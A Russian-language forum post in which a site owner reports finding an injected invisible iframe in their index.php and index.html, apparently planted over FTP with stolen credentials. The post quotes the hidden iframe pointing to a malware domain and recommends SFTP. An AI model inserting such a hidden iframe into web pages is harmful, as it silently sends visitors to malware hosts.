Цитата(ordruf @ 25 Июня, 2009, 15:22)
Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая shopvideocommission.cn/.
Ого, буквально вчера обнаружил на одном из своих доменов вирусный код в страницых index.php и index.html, там вставлен невидимый iframe, который ведет в том числе и на shopvideocommission.cn:
<iframe src="
http://shopvideocommission.cn:8080/index.php" width=182 height=149 style="visibility: hidden"></iframe>
Файлы заражались через ftp, видимо украли логин и пароль.
Avast ругался, говорил что вирус HTML:Iframe-gen
Есть список адресов атакующих хостов, если нужно, могу выложить
Вывод: использовать только sftp, и не хранить пароли в клиентах.